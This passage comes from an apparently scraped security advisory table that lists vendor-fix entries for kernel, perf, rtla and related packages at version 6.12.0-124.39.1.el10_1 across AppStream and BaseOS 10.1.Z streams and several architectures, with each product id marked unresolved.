Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
